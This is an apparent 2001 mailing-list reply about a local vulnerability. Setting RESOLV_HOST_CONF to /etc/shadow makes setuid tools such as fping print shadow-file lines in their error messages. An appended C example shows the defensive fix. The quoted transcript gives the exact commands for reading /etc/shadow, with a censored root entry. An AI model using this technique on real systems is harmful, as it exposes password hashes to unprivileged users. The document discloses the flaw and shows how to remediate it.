
Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability



On Mon, Jan 08, 2001 at 05:57:23PM +0000, thomas lakofski wrote:
> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
> 
>   Script started on Mon Jan  8 17:48:23 2001
>   thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
>   thomas@io:~$ ping localhost
>   PING localhost (127.0.0.1): 56 data bytes
> 
>   --- localhost ping statistics ---
>   2 packets transmitted, 0 packets received, 100% packet loss
>   thomas@io:~$ fping localhost
>   /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
> 
>   [snip]

Most weird.  I get this behaviour when running through a setuid root
strace, but I don't get the error messages (and hence the content of
/etc/shadow) when I don't use strace.  I'm still running potato.

   Julian

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

         Julian Gilbey, Dept of Maths, Queen Mary, Univ. of London
       Debian GNU/Linux Developer,  see http://people.debian.org/~jdg
  Donate free food to the world's hungry: see http://www.thehungersite.com/
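
The defensive side of the behaviour shown in the transcript above, as an added example that is not part of the thread or of any library's source: a privileged process ignores the `RESOLV_HOST_CONF` override, and the parse diagnostic stops echoing the offending line. The function names `is_privileged`, `host_conf_path` and `format_parse_error` are hypothetical, and `/etc/host.conf` is assumed as the default path.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_HOST_CONF "/etc/host.conf"

/* True when the process runs with more privilege than its invoker
 * (setuid or setgid binary). */
int is_privileged(void)
{
    return geteuid() != getuid() || getegid() != getgid();
}

/* Pick the resolver config path. The environment override is honoured only
 * for unprivileged processes. `privileged` is a parameter so the policy can
 * be tested without a setuid binary. */
const char *host_conf_path(const char *env_override, int privileged)
{
    if (privileged || env_override == NULL || *env_override == '\0')
        return DEFAULT_HOST_CONF;
    return env_override;
}

/* Build a parse diagnostic in the format seen in the transcript.
 * echo_line=1 reproduces the leaking form; echo_line=0 names only the
 * file and line number, so file content never reaches stderr. */
int format_parse_error(char *out, size_t n, const char *path, int lineno,
                       const char *line, int echo_line)
{
    if (echo_line)
        return snprintf(out, n, "%s: line %d: bad command `%s'", path, lineno, line);
    return snprintf(out, n, "%s: line %d: bad command", path, lineno);
}

int main(void)
{
    /* Constructed sample line standing in for unreadable file content. */
    const char *line = "user:CONSTRUCTED-HASH:11063:0:99999:7:::";
    const char *path = host_conf_path(getenv("RESOLV_HOST_CONF"), is_privileged());
    char msg[256];

    format_parse_error(msg, sizeof msg, path, 1, line, 0);
    fprintf(stderr, "%s\n", msg);
    return 0;
}
```

On glibc, `secure_getenv()` combines the environment lookup and the privilege check in one call.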


